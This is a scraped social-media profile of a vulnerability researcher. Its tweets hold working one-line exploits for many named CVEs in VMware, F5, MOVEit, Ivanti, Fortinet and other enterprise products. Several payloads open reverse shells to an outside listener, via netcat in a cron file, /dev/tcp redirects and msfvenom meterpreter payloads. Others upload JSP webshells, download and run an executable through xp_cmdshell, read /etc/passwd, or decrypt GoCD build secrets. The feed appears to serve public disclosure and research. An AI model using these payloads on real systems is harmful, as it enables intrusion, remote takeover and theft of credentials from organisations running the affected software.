wvu Profile Banner
wvu Profile
wvu

@wvuuuuuuuuuuuuu

6,376
Followers
1,577
Following
158
Media
11,377
Statuses

Sentient one-liner grepping the Internet for signs of intelligence. VulnCheck. Previously Atredis, Rapid7 vuln research, and Metasploit.

Joined November 2013
Don't wanna be here? Send us removal request.
Pinned Tweet
5
1
22
Tweet media one
26
80
892
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv " https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444"
Tweet media one
Tweet media two
5
382
847
Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
9
195
578
Tweet media one
@sc_codeUM
Ada Lündhé
4 months
Stop. Writing. Bash scripts.
507
35
1K
5
36
460
Don't bash open-source developers and maintainers, please. Bugs happen, and the software is free. Hate the bug, not the dev.
@yazicivo
Volkan Yazıcı
3 years
Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.
176
2K
10K
4
90
378
Who remembers when Ubuntu was a brown Debian?
Tweet media one
40
21
366
CVE-2022-1388 is an unauthed RCE in F5 BIG-IP. Hat tip @n0x08 .
5
141
364
PHP.
@snap_sec
Snap Sec
2 years
Can you spot a bug🐞 in this code👨‍💻? #appsec #infosec #cybersecurity
Tweet media one
151
77
493
26
28
313
This works against Docker: curl -kv https://127.0.0.1:8443/api/content/ -F "hax=@-;filename=../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://127.0.0.1:8443/x.jsp -d "c=touch /tmp/vulnerable"
@infosec_au
shubs
2 years
A few months ago, I collaborated with @HusseiN98D to find critical vulnerabilities in a bank. It involved finding a 0day in dotCMS. You can read about the discovery and exploitation process here:
10
181
591
7
76
286
You find yourself inside an SSH tunnel. Around you is darkness. You fumble for your flashlight, but it is nowhere to be found.
23
31
261
CVE-2022-29464 PoC for this in two commands... 1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 | curl -kv https://192.168.0.6:9443/fileupload/toolsAny -F ../../../../repository/deployment/server/webapps/x.war=@- 2. curl -kv https://192.168.0.6:9443/x :/
On WSO2 CVE-2022-29464... you'll definitely want to check for deployed WAR files in addition to JSP. Confirmed a full Java Meterpreter shell for this.
2
5
36
7
77
248
The workaround for Pulse Secure CVE-2021-22893 blocks the following URI patterns: ^/+dana/+meeting ^/+dana/+fb/+smb ^/+dana-cached/+fb/+smb ^/+dana-ws/+namedusers ^/+dana-ws/+metric So not much more than we already know, but at least these are the specific patterns, AFAICT.
2
113
243
"The difference between a PoC and an exploit is one works on my box, and the other works on yours."
@varcharr
casey
3 years
the bad news is that someone hacked your computer the good news is that my exploit worked
2
14
131
3
45
237
curl PoC for MOVEit CVE-2023-35708: time curl -kv https://192.168.56.103/machine.aspx -H "X-IPSGW-ClientCert: $(openssl req -x509 -noenc -keyout /dev/null -subj "/CN=';SELECT SLEEP(10);--" -outform DER | base64 -w 0)"
@MCKSysAr
MCKSys Argentina
1 year
As promised, here's a pic of the Poc for CVE-2023-35036 (Progress MOVEit Transfer). As soon as I can get RCE, I'll upload the final PoC to github. Any ideas/suggestions are welcomed!
Tweet media one
9
44
146
9
86
239
This is my last week at Rapid7. The past eight and a half years have been an incredible journey of growth and self-discovery, but it's time to move on and grow in new directions. Thank you to all the peers I've had here, in particular Metasploit and ETR. You know who you are!
29
7
225
Ivanti Avalanche CVE-2023-32563: curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe
3
57
176
[root @PA -VM ~]# cat /proc/sys/kernel/randomize_va_space 0 [root @PA -VM ~]#
19
13
171
oh my god i'm a pentester now
22
2
159
Metasploit module for VMware vCenter Server CVE-2021-21985, leveraging Ricter Z's SSRF-based RCE chain.
1
60
139
CVE-2021-38647 RCE PoC using ExecuteScript (multi-line shell script execution): curl -v http://127.0.0.1:5985/wsman -H "Content-Type: application/soap+xml" -d <XML payload>
I just reproduced CVE-2021-38647 (unauthed root RCE in the OMI agent) using the details in the technical blog post. <p:StdOut>uid=0(root) gid=0(root) groups=0(root)& #10 ;</p:StdOut> 🤯
2
28
103
1
52
131
Slides from my talk with @egyp7 plus more examples: .
3
58
129
I am happy to say that I'll be starting at @Atredis next week. :)
I do have something lined up that I'm excited about, but that news will have to wait! :-)
5
0
25
26
5
126
CVE-2023-38035: curl -kv https://RHOST:8443/mics/services/MICSLogService -H "Content-Type: application/x-hessian" --data-binary @<(printf "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00\x30sudo bash -c bash&>/dev/tcp/192.168.56.1/4444<&1S\x00\x06isRootTzNz")
5
39
123
Tweet media one
1
27
126
@wvuuuuuuuuuuuuu
wvu
10 months
Confirmed auth bypass!
@SI_FalconTeam
SECUINFRA FALCON TEAM
10 months
🚨 #Cisco #IOSXE #CVE -2023-20198 #CVE -2023-20273 Patience is a virtue 🙂 We can confirm: New activity from IP 192.3.101[.]111 today. Our HPs 🍯 show exploit attempts on clean appl. + Implant usage e.g. "show ver" for recon. Happy to share PCAPs, TLP:💛 ➡️ DM. cc @ET_Labs
Tweet media one
14
44
213
2
31
110
I will never not like/retweet threads about command-line tips and tricks, no matter how simple or complex they are. Sharing is caring, and it's a refreshing attitude to see.
5
5
108
I just reproduced CVE-2021-38647 (unauthed root RCE in the OMI agent) using the details in the technical blog post. <p:StdOut>uid=0(root) gid=0(root) groups=0(root)& #10 ;</p:StdOut> 🤯
@nirohfeld
Nir Ohfeld
3 years
Microsoft just patched 4 vulnerabilities we ( @wiz_io ) recently reported, including a CVSS 9.8 RCE. These vulnerabilities affect countless machines as the OMI agent is silently installed when enabling many Azure services. #PatchTuesday
5
129
276
2
28
103
Looking at the patch for Atlassian Confluence CVE-2022-26134 on my lunch break... - final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack); - final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack); 👀
5
30
101
The Metasploit module for ProxyShell has landed in the tree. Many thanks to @zeroSteiner for the development effort. Module: Documentation:
@catc0n
Caitlin Condon
3 years
ProxyShell exploit chain analysis in AttackerKB c/o @zeroSteiner and @wvuuuuuuuuuuuuu . Exploit should be coming to a Metasploit Framework fork near you soon.🐚 Props as always to @orange_8361 on the great research!
4
23
63
1
50
96
Note that attackers can control most of the request, too, including sending a POST instead of a GET. curl -v " http://127.0.0.1/?unix:$(perl -e 'print "A"x4096')| http://172.16.57.1:8080/" -d foo=bar
@rapid7
Rapid7
3 years
In September, Apache released a fix for CVE-2021-40438, a critical SSRF #vulnerability . Several sources now confirm they've seen exploit attempts in the wild – learn more and find mitigation guidance:
Tweet media one
1
13
17
3
25
99
Updated with further patch analysis and PoC/IOCs. curl -kv https://[redacted]/ui/h5-vsan/rest/proxy/service/CLASS/METHOD -H "Content-Type: application/json" -d {} VMware vCenter Server CVE-2021-21985?
A familiar pattern is revealed in VMware vCenter Server CVE-2021-21985/CVE-2021-21986... + <filter-mapping> + <filter-name>authenticationFilter</filter-name> + <url-pattern>/rest/*</url-pattern> + </filter-mapping>
1
10
24
3
33
93
My notes on Atlassian Confluence CVE-2021-26084 are posted here. A vuln check, RCE PoC, and log IOCs are included. Many thanks to @catc0n for writing words.
3
39
92
RCE: echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013
@Horizon3Attack
Horizon3 Attack Team
6 months
Our deep-dive for the recent #Fortinet #FortiClient EMS SQL injection vulnerability, CVE-2023-48788, that leads to RCE as SYSTEM.
8
103
239
1
28
85
Confirmed. Unfortunately.
@hackerfantastic
hackerfantastic.x
3 years
Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49 curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" ' http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv Patch urgently.
Tweet media one
14
523
1K
3
11
86
If you're auditing code or trying to write a PoC, look at the unit tests...
4
9
84
I just want to hack things with cool people.
7
3
78
PSA: curl can do variables. Example using Nexus CVE-2024-4956: curl -v --variable hax=////../../../../etc/passwd --expand-url http://127.0.0.2:8081/{{hax:url}}
1
17
76
@Andrew___Morris btw i use arch
1
0
70
Full details on the CVE-2021-40539 exploit chain.
@Synacktiv
Synacktiv
3 years
Takeover an entire domain by resetting passwords! We detailed how to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus in this blogpost @acervoise - @tiyeuse
0
60
148
3
14
69
We need an IRC channel with all the vuln researchers in it.
8
9
68
Confirmed working. wvu @hiigara :~/Downloads$ python3 -t 192.168.1.12 -c id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0 wvu @hiigara :~/Downloads$
@Horizon3Attack
Horizon3 Attack Team
2 years
Last Friday we passed our POC to @GreyNoiseIO to build early detections. With reports of exploitation and multiple POCs now public here ours is. Advise to apply mitigations or patch immediately. #f5 #CyberSecurity
2
46
128
2
11
64
Anyone analyzing this? :)
@ptswarm
PT SWARM
2 years
🔥 Veeam fixed an Unauth RCE (CVE-2022-26500, CVE-2022-26501) in Veeam Backup & Replication and a Local Privilege Escalation (CVE-2022-26503) in Veeam Agent for Microsoft Windows found by our researcher @ultrayoba . Advisory:
Tweet media one
7
184
443
5
13
63
Map Metasploit modules to CVEs...
@iagox86 @ldsopreload @zeroSteiner @metasploit I'm neither, but FWIW, this works for me: jq '.[]|{fullname,cve:.references[]|select(startswith("CVE-"))}' ~/.msf4/store/modules_metadata.json
1
3
20
1
17
65
Nothing special, but here are a couple MobileIron management shell escapes if you need 'em: install rpm url http://127.0.0.1/;sh install rpm info detail -E%{lua:rpm.interactive()}
3
18
64
Retweeting this, since not too many people know about it. It's useful for debugging exploits, converting a module back into a PoC, and for building detections.
4
24
63
Technical details on VMware vCenter Server CVE-2021-22005, including steps up to (but not including) RCE.
@dabdine
Derek Abdine
3 years
Full technical & internet-facing impact analysis of CVE-2021-22005. Kudos to @wvuuuuuuuuuuuuu . Always fun hunting together!
2
75
155
1
23
62
CVE-2024-1212 reverse root shell: curl -kv " https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' #:"
@RhinoSecurity
Rhino Security Labs
6 months
New Blog Post: CVE-2024-1212: Unauthenticated Command Injection In Progress Kemp LoadMaster
2
22
67
1
24
61
@twokilohertz
ᵃᵈᵃᵐ
3 years
@ccosppie @pierrebertin123 also, this screenshot sort of speaks for itself.
Tweet media one
3
40
221
1
1
62
I must not procrastinate. Procrastination is the time-killer. Procrastination is the little-death that brings total distraction.
8
6
61
Last day. Here we go! :')
This is my last week at Rapid7. The past eight and a half years have been an incredible journey of growth and self-discovery, but it's time to move on and grow in new directions. Thank you to all the peers I've had here, in particular Metasploit and ETR. You know who you are!
29
7
225
8
1
62
If you thought the D-Link "backdoor" (CVE-2024-3272, CVE-2024-3273) was new, please see this writeup from 2018.
5
18
59
There is an RCE PoC for CVE-2022-26134 in this blog post. I haven't tested it yet.
@catc0n
Caitlin Condon
2 years
The Rapid7 team has a root cause analysis of Confluence CVE-2022-26134 out now with thanks to @Junior_Baines . This is an emergency mitigation situation.
2
106
188
3
20
59
. @steventseeley You again!!
Tweet media one
1
4
58
Confirmed exploitability of this last night.
@80vul
heige
2 years
Apache CouchDB EPMD port:4369/TCP in ZoomEye About 81,154 results (Nearly year: 81,154 results) Of course, there has been an RCE vulnerability caused by default cookies in this protocol recently (CVE-2022-24706)
Tweet media one
2
36
112
2
20
56
Re CVE-2024-3400, please don't lock your detections to endpoint. I'm able to trigger the file write against /.
6
10
54
Nothing better than root access to an appliance over SSH.
5
4
52
We have confirmed the D-Link backdoor statically and reproduced its behavior in QEMU.
@BleepinComputer
BleepingComputer
5 months
Critical RCE bug in 92,000 D-Link NAS devices now exploited in attacks - @serghei
1
53
96
3
12
54
Got RCE. Woohoo! Many thanks to @testanull et al.
@iamnoooob
Rahul Maini
3 years
Just did Atlassian Confluence UnAuth RCE CVE-2021-26084 along with @rootxharsh . It was relatively simpler than expected :D
Tweet media one
14
108
600
2
6
53
Open source is fun. (:
4
5
51
Minimized PoC: curl -kv https://172.16.57.254:4444/var -H "Content-Type: application/json; charset=UTF-8" -d '{"SID":"|touch /tmp/vulnerable|"}' Thanks for all the hacks, @jstnkndy . 👍
@Atredis
Atredis Partners
3 years
When you come across an Unauth RCE CVE with no public details, what do you do? Justin Kennedy ( @jstnkndy ) shares his adventure, both failures and successes, in uncovering the mysteries of CVE-2020-25223 in this writeup:
Tweet media one
8
77
172
2
22
52
Writeup has been updated with full details, including IOCs for defenders. The SSRF vector is still developing. I'll upload more code in a bit. 😩
Uploaded a few of my notes and PoCs from investigating CVE-2021-22986 (F5 iControl REST) this past week.
3
40
110
2
25
51
I hear you get one white hair for every PoC or exploit you've written.
7
7
48
Endpoints: /services/messagebroker/amf /services/messagebroker/nonsecureamf /services/messagebroker/nonsecurestreamingamf /services/messagebroker/streamingamf
@CVEnew
CVE
6 months
CVE-2024-0692 The SolarWinds Security Event Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse SolarWinds’ ser…
3
34
68
1
10
49
The full RCE chain for CVE-2021-21975 + CVE-2021-21983 might just fit in a tweet... FYI, I first tested 8.3.0, which is vulnerable to the SSRF but didn't seem exploitable for creds. YMMV, but I wasted time on it, lol. Great find, Egor and PT!
@ptswarm
PT SWARM
3 years
VMware fixed CVE-2021-21975 and CVE-2021-21983, which when chained together lead to an unauth RCE in vRealize Operations. The vulnerabilities were found by our researcher Egor Dimitrenko. Advisory:
Tweet media one
3
98
244
0
12
49
First win and first fail today. On my way to being a real pentester!
4
2
48
Ever find yourself forgetting to change RPORT to 443 when you set the SSL option in Metasploit? Now you'll be reminded!
Tweet media one
2
7
46
This also works with POST request. curl -v " http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>
@PortSwiggerRes
PortSwigger Research
3 years
Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) by @artsploit #exploit #bugbounty
15
174
365
2
16
47
@wvuuuuuuuuuuuuu
wvu
10 months
Vuln analysis is just real-world CTF.
1
4
44
everyone talks about return to work, but what about return to irc?
4
4
45
what if attackers had code names for defenders
7
5
43
Updated with information on decrypting build secrets (environment variables) after exploiting GoCD CVE-2021-43287. openssl aes-128-cbc -d -a -K 8db66fa5892e8bba1931fdbc7999034d -iv $(xxd -p <(base64 -d <<<S1+AMT0qR1Tc1e/0pszILQ==)) <<<CcOFLa59jShholBS0pV+yg==
Notes and PoC for the pre-auth takeover of build pipelines in GoCD. curl -v " http://127.0.0.1:8153/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
4
53
132
1
6
44
I'm amazed this Metasploit module still works (i.e., it isn't broken).
Tweet media one
1
7
43
@wvuuuuuuuuuuuuu
wvu
11 months
Phew, we got an IOS XE bind shell working.
4
1
43
PoC for CVE-2021-44077 fits in one line/tweet.
PoC: ./msfvenom -p windows/x64/shell_reverse_tcp -f exe lhost=172.16.57.1 | curl -v http://172.16.57.210:8080/RestAPI/ImportTechnicians -F step=hax -F "theFile=@-;filename=msiexec.exe" -: -m 3.5 http://172.16.57.210:8080/RestAPI/s247action -d execute=s247AgentInstallationProcess
2
10
26
0
25
43
this is the web they stole from us
@gf_256
cts 🌸🏳️‍⚧️
3 months
so umm... yea lets just say ... github has a css injection 😳
61
275
4K
2
6
43
oh, you love command injections? name every command
16
1
42
Great chain. A fine example of using XXE to upload a file, too!
@Horizon3Attack
Horizon3 Attack Team
2 years
Check out a recent finding by one of our own, Naveen Sunkavally. CVE-2022-28219 is an unauth RCE for ManageEngine ADAudit Plus. This XXE -> Deserialization chain often leads to host compromise as well as priv'd AD creds. Check out the blog post and POC:
6
258
707
3
5
43
How to escape infosec Twitter?
20
0
41
Analysis, PoCs, and IOCs for Cisco HyperFlex HX Data Platform CVE-2021-1497/CVE-2021-1498 and CVE-2021-1499. Another great find from @ptswarm . curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
@ptswarm
PT SWARM
3 years
Cisco fixed two Unauth RCEs and an Arbitrary File Upload in HyperFlex HX Data Platform found by our researchers Nikita Abramov and Mikhail Klyuchnikov. CVE-2021-1497 CVE-2021-1498 CVE-2021-1499 Advisory:
Tweet media one
1
47
109
0
16
43
Seriously good advice. I read man pages on flights when I don't have internet access. You can learn so much from the manual. Read it, even if you don't "need" it.
3
6
41
Other socat examples from the man page.
@iagox86
Ron Bowes
2 years
TIL how to "sniff" a UNIX domain socket: # mv /var/run/sock /var/run/sock.original # socat -t100 -x -v UNIX-LISTEN:/var/run/sock,mode=777,reuseaddr,fork UNIX-CONNECT:/var/run/sock.original (This might mess up the thing using the socket though :) )
1
26
117
3
10
41